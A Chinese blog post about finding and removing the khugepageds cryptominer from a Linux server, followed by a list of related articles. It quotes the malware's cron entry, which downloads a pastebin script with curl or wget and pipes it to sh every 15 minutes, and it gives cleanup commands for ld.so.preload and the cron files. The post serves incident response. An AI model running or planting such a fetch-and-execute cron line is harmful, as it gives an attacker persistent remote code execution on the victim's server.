Linux服务器CPU占用100%,Error: No space left on device,khugepageds挖矿病毒引起

最新推荐文章于 2024-03-14 17:52:04 发布
最新推荐文章于 2024-03-14 17:52:04 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 遇坑合集 文章标签: Error: No space left on device khugepageds CPU占用100% Linux 挖矿病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LittleBlackyoyoyo/article/details/92790262
版权
最近部署RabbitMQ运行的时候提示:Error: No space left on device(磁盘空间不足)

df -h 查看磁盘使用情况,发现磁盘并没有占用满

在这里插入图片描述

df -i 继续查看 inode 使用情况,发现也没有占用满

在这里插入图片描述

查看阿里云服务器控制台,CPU使用显示占用100%

运行# top发现%Cpu(s): 2.0 us, 1.7 sy, 0.0 ni,96.0 id, 0.0 wa, 0.0 hi, 0.3 si, 0.0 st中 id 为96%,说明CPU闲置96%,CPU占用不为100%,与事实情况不符。这个时候你就要怀疑是否病毒造成了。

在这里插入图片描述

Top 命令显示参数解释

%Cpu(s): 2.0 us, 1.7 sy,  0.0 ni,  96.0 id,  0.0 wa,  0.0 hi,  0.3 si,  0.0 st

其中us 2.0% 并不代表消耗就是2.0%,这是表示用户占用的cpu,而 sy 表示系统占用的cpu ,id 表示闲置的。

所以查看服务器的cpu消耗,应该查看id的百分比,占用就是1-id%

查看计划任务# crontab -l,发现远程脚本的定时任务

*/15 * * * * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q -O- https://pastebin.com/raw/TS4NeUnd)|sh

处理远程病毒脚本

排查清理 /etc/ld.so.preload 中是否加载有恶意动态链接库

vim /etc/ld.so.preload
发现存在恶意动态链接库

在这里插入图片描述

删除/usr/local/lib/libcryptod.so恶意动态链接库
rm -rf /usr/local/lib/libcryptod.so
修改/etc/ld.so.preload此文件中的内容

按i键进入编辑模式,删除/usr/local/lib/libcryptod.so字段,按Esc键退出编辑模式,w!强制保存,q退出

使用top,查看发现为Linux挖矿病毒khugepageds,记住其PID,并杀死:kill -9 17957
在这里插入图片描述

排查清理可能残留的恶意文件:
  • 删除文件rm -f /usr/sbin/watchdogs /etc/init.d/watchdogs
  • 分别编辑 vim /var/spool/cron/rootvim /etc/cron.d/root文件,删除定时内容
重启定时任务
systemctl reload crond.service

执行crontab -l此时发现病毒的定时任务已删除

在这里插入图片描述

再查看阿里云服务器CPU占用情况,发现CPU占用恢复正常

在这里插入图片描述

小黑小黑白
关注
专栏目录
Error: ENOSPC: no space left on device,判断磁盘不足的集中情况
ximenxiafeng的专栏
05-21 8803
遇到上边的错误,一般来说就是服务器无法创建文件了,这时候咱们可以从两个方向寻找问题 1、磁盘上block或者inode占满 1、磁盘的block占满,查看命令 df -h [root@S100900 ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/vda3 35G 28G 5.6G 83% / tmpfs 504M 0 504M 0% /dev/shm /dev/v
Linux-x86_64 Error: 28: No space left on device
huangbaokang的博客
08-14 4193
在测试一个比较复杂的查询SQL时,数据库突然出现无法从套接字读取更多的数据问题,然后以命令的形式登录到数据库,报了如下错误: [oracle@wlorcl ~]$ sqlplus / as sysdba SQL*Plus: Release 11.2.0.1.0 Production on Tue Aug 14 21:31:41 2018 Copyright (c) 1982, 2009,...
java占用物理内存不释放,Hugepage导致进程占用物理内存过多的问题
weixin_32770297的博客
03-21 792
1 问题业务同样的程序跑在TDocker、XEN,占用的内存却相差很大。TDocker:XEN:可以看到,虽然VIRT一样,但是程序占用的物理内存却相差6倍。2 原因分析经过各种分析,后来levy同学发现关闭transparent hugepage就解决了这个问题。TDocker使用的CentOS6.5的内核,默认开启了transparent hugepage。# cat /sys/kernel/...
mysql负载突然飙升_hugepages使用出现kswapd导致系统负载突然上升
weixin_39627201的博客
02-19 144
在运行Oracle 数据库的linux 服务器上,某个时间段的每分钟负载会突然上升到40 以上,在进程队列里看到kswapd0 出现,导致数据库在运行Oracle 数据库的linux 服务器上,某个时间段的每分钟负载会突然上升到40 以上,在进程队列里看到kswapd0 出现,导致数据库无响应,持续时间数分钟。对于应用而言,这个时间段有明显的停滞感,像系统已经挂掉了一样。如果这是发生在Oracle...
hugepages使用出现kswapd导致系统负载突然上升
miki西游 不积跬步,无以至千里;不积小流,无以成江海
07-02 389
在运行Oracle 数据库的linux 服务器上,某个时间段的每分钟负载会突然上升到40 以上,在进程队列里看到kswapd0 出现,导致数据库无响应,持续时间数分钟。 对于应用而言,这个时间段有明显的停滞感,像系统已经挂掉了一样。 如果这是发生在Oracle RAC 环境中某一个节点上,那么这个节点就可能会重启。 这属于非常严重和致命的问题。 (miki西游...
docker activeMQ "no space left on device"问题解决
lps11188的博客
05-26 840
activeMQ在使用过程中,出现这个错误: W/System.err: javax.jms.JMSException: java.util.concurrent.ExecutionException: java.io.IOException: No space left on device 存储空间不足。 这表示的是存放activeMQ的docker中的空间不足。 解决方法: 通过下面的命令来...
mysql5.7 huge page_huge page 能给MySQL 带来性能提升吗?
weixin_29327525的博客
01-21 365
最近一直在做性能压测相关的事情,有公众号的读者朋友咨询有赞的数据库服务器有没有开启huge page,我听说过huge page会对性能有所提升,本文就一探究竟。对过程没有兴趣的可以直接看结论。二 Huge Page 来龙去脉2.1 为什么需要Huge PageLinux 操作系统上运行内存需求量较大的应用程序时,由于其采用的默认页面大小为 4KB,因而将会产生较多 TLB Miss 和缺页中...
docker error: no space left on device 问题及解决
yourtone的博客
02-09 2761
【运行】 docker run -i -t 镜像名 /bin/bash 【报错】 docker: write /var/lib/docker/tmp/GetImageBlob167182478: no space left on device. 【解决方案1】更新docker.serive文件——未解决 ubuntu - Docker error : no space left on device - Stack Overflowhttps://stackoverflow.com/a/561267
Linux中出现“No space left on device”错误的排查与解决方法
01-20
最近这两天登陆服务器,发现用 wget 下载文件的时候提示“No space left on device”,而且连使用 tab 键进行补全时也会提示该错误。 之前遇到过一次这种问题,是由于磁盘空间被占满了,导致无法创建新文件。正常...
CentOS 出现no space left on device错误解决办法
09-30
CentOS系统中出现"No space left on device"的错误提示,通常意味着系统可用磁盘空间不足,导致无法写入或创建新的文件和目录。在使用阿里云的CentOS服务器环境中,若配置有nginx和apache组合的Web服务器,并且网站...
出现no space left on device(磁盘空间不足)该如何解决?
最新发布
ZF_1326的博客
03-14 3759
indoes存储区:它是由许多indoe组成的列表,每个indoe中存储的时文件的元信息,包括:文件大小,文件类型(常规文件、目录、软连接等),权限(读写执行权限),属组(所属用户组),属主(所属用户),连接数(有多少个文件名指向这个indoe),文件创建时间,文件最近访问时间,文件最近修改时间,文件内容所在的block位置。(3)通过rm -rf + 文件名|目录 来删除该文件或者目录,也可以使用ls | xargs rm -rf + 目录来删除目录下的全部文件。使用以下命令来进行查看。
linux 透明巨页khugepaged 后台进程分析
runshui27的博客
11-23 446
https://blog.csdn.net/wdjjwb/article/details/80814512
oracle 审计功能
diaoyu8833的博客
05-26 161
Oracle11g推出了审计功能,但这个功能会针对很多操作都产生审计文件.aud,日积月累下来这些文件也很多,默认情况下,系统为了节省资源,减少I/0操作,其审计功能是关闭的 一、审计功能关闭 1、查看审计功能是否开启?su – oraclesqlplus “/as sysdba”SQL> show parameter audit_trail NAME...
记录一次centos被挖矿病毒感染的经历
热门推荐
fengwuxichen的博客
04-26 1万+
公司测试环境一台虚拟机被挖矿病毒感染,CPU持续飚。感染原因应该是redis没有设置密码导致的。记录一下临时处理记录。 安装busybox 由于系统中的链接库、依赖可能已经被病毒篡改,如果需要仔细排查的话要先安装busybox,不然直接使用ps或者top是可能看不到病毒的,我这边是直接拉起一个busybox的docker容器,把busybox从容器中复制出来,放到中毒机器的/usr/bin下面。...
Linux 创建消息队列时出现 No space left on device的处理方法
weixin_30672019的博客
11-04 303
Linux 创建消息队列有时会出现No space left on device的描述,会有以下一些解决方案: 出现这样的原因基本上就是现有的消息队列数等于预设的最大队列数可以用 1. sysctl -w kernel.msgmni=你想设置的最大队列数 2. 可以清空现有的消息队列 ,在终端输入 : ipcs -q | awk '{printf $2 "...
Linux挖矿病毒 khugepageds详细解决步骤
weixin_30565327的博客
04-01 793
一.背景 最近公司一台虚拟机被攻击,其中一种挖矿病毒、会伪CPU数、即如果用top命令只能看到一个cpu、并且负载、实际上整个负载300%以上,及时定时任务关掉也不起作用。 二.言归正传开始干掉这个麻烦的病毒(脚本如下): #关掉定时任务 service crond stop #删除so库 busybox rm -f /etc/ld.so.pr...
关于Transparent Hugepage
lin_FS的专栏
06-21 1万+
1 = Transparent Hugepage Support = 2 3 == Objective == 4 5 Performance critical computing applications dealing with large memory 6 working sets are already running on top of libhugetlbfs and in turn
linux进程khugepaged,linux 透明巨页khugepaged 后台进程分析
weixin_36072221的博客
04-29 1476
简介:透明巨页Transparent Hugepage 可以代替以前的hugetlbfs方式。相关说明可以参考内核Documentation\vm\transhuge.txt文档。khugepaged :khugepaged 是透明巨页的守护进程,它的主要功能是定时唤醒,根据配置尝试将4k 的普通page转成2M等巨页,减少TLB压力,提内存使用效率。khugepaged的处理过程中需要各种内存...
linux-x86_64 error: 28: no space left on device
09-07
"Linux-x86_64 error: 28: no space left on device"是指在Linux操作系统中,出现了磁盘空间不足的错误。这种错误通常发生在硬盘或分区的可用空间已经耗尽,无法继续写入数据或创建新文件。 当系统磁盘空间不足时,可能会导致一些严重的问题,例如无法正常运行软件或操作系统等。因此,我们需要采取一些措施来解决这个问题。 首先,我们可以使用`df -h`命令来查看磁盘空间的利用情况。它会显示出所有磁盘分区的使用情况以及剩余空间。 如果我们发现有一些大文件或文件夹占用了大量的磁盘空间,我们可以使用`du -sh <文件名或文件夹名>`命令来查找占用空间最多的文件或文件夹。 一种常见的解决方法是删除一些不再需要的文件或文件夹,以释放磁盘空间。可以使用`rm`命令删除单个文件,或使用`rm -r`命令删除整个文件夹。 另外,我们也可以考虑使用一些工具来压缩已有的文件或文件夹,以节省磁盘空间。例如,可以使用zip或tar命令将文件打包成压缩文件,然后删除原始文件。 如果上述方法无法解决问题,可能需要对磁盘进行扩容。这可以通过添加新的硬盘或扩展现有的分区来实现。具体的步骤可以根据不同的情况而定,可以参考一些相关的教程或咨询专业人士的建议。 总之,当出现"Linux-x86_64 error: 28: no space left on device"错误时,我们应该首先查看磁盘空间的使用情况,然后删除不需要的文件或压缩已有文件,并在必要时扩展磁盘的容量,以解决这个问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值